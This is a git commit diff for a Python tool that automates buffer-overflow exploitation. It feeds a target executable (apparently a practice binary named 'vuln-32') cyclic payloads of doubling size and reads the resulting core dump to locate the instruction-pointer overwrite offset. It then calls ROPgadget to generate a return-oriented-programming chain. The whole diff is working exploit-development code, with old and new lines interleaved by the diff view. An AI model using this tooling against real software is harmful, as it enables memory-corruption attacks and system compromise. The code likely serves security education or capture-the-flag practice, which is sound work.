Cat, argparse, payload sizes, more graceful errors

Co-authored-by: Chris Gora <34940205+ChrisGora@users.noreply.github.com>
Co-authored-by: jack bond-preston <jackbondpreston@outlook.com>
This commit is contained in:
Liam Dalgarno 2020-11-25 16:17:36 +00:00
parent 5f8099dde0
commit 99cb451194


@ -1,41 +1,69 @@
from pwnlib.elf.corefile import Coredump from pwnlib.elf.corefile import Coredump
from pwnlib.util.cyclic import cyclic, cyclic_find from pwnlib.util.cyclic import cyclic, cyclic_find
from pwnlib.util.packing import pack from pwnlib.util.packing import pack
from pwnlib.tubes.process import process from pwnlib.tubes.process import process, signal
import os import os
import subprocess import subprocess
import argparse
import warnings
import ROPgadget.ropgadget
exec_name = "./vuln-32" print(r'''
_ ___ _.--. ___ _____ ______ _____ ______ ______
\`.|\..----...-'` `-._.-'_.-'` / _ \ / ____| /\ |____ / ____| /\ | ____| ____|
/ ' ` , __.--' | | | |_ _| | / \ / / | / \ | |__ | |__
)/' _/ \ `-_, / | | | \ \/ / | / /\ \ / /| | / /\ \ | __| | __|
`-'" `"\_ ,_.-;_.-\_ ', | |_| |> <| |____ / ____ \ / / | |____ / ____ \| | | |____
_.-'_./ {_.' ; / \___//_/\_\\_____/_/ \_\/_/ \_____/_/ \_\_| |______|
{_.-``-' {_/
''')
def find_offset(exec_name): arg_parser = argparse.ArgumentParser(description="Run an automated ROP on an executable")
# TODO: command line arguments arg_parser.add_argument("exec_file", metavar="exec_file", type=str, help="The executable file to exploit")
arg_parser.add_argument("--core", "--c", metavar="core_file", type=str, help="The name of the generated core file")
args = arg_parser.parse_args()
exec_file = args.exec_file
core_file = args.core
def find_offset(exec_file, core_file):
input_file = "input.txt" input_file = "input.txt"
core_file = "./core"
os.remove(core_file) try:
os.remove(core_file)
except:
pass
# TODO Loop until a crash, increase payload size each iteration payload_size = 32
with open(input_file, "wb") as f: while payload_size <= 16384:
payload = cyclic(512) print(f"[🤔] Trying payload {payload_size}...")
f.write(payload)
process([exec_name, input_file]).wait() with open(input_file, "wb") as f:
payload = cyclic(payload_size)
f.write(payload)
core = Coredump('./core') process([f"./{exec_file}", input_file]).wait()
assert pack(core.eip) in payload try:
core = Coredump(f"./{core_file}")
os.remove(input_file) if core and pack(core.eip) in payload:
offset = cyclic_find(core.eip)
print(f"[😳] Found offset at {offset}!")
return offset
except FileNotFoundError:
pass
return cyclic_find(core.eip) os.remove(input_file)
payload_size *= 2
offset = find_offset(exec_name) raise BaseException("Failed to find offset")
# print("\t# Padding goes here") <-- search for this
# print("\tp = ''\n")
result = subprocess.run(["ROPgadget", "--binary", exec_name, "--ropchain"], stdout=subprocess.PIPE) offset = find_offset(exec_file, core_file)
result = subprocess.run(["ROPgadget", "--binary", exec_file, "--ropchain"], stdout=subprocess.PIPE)
stdout = result.stdout stdout = result.stdout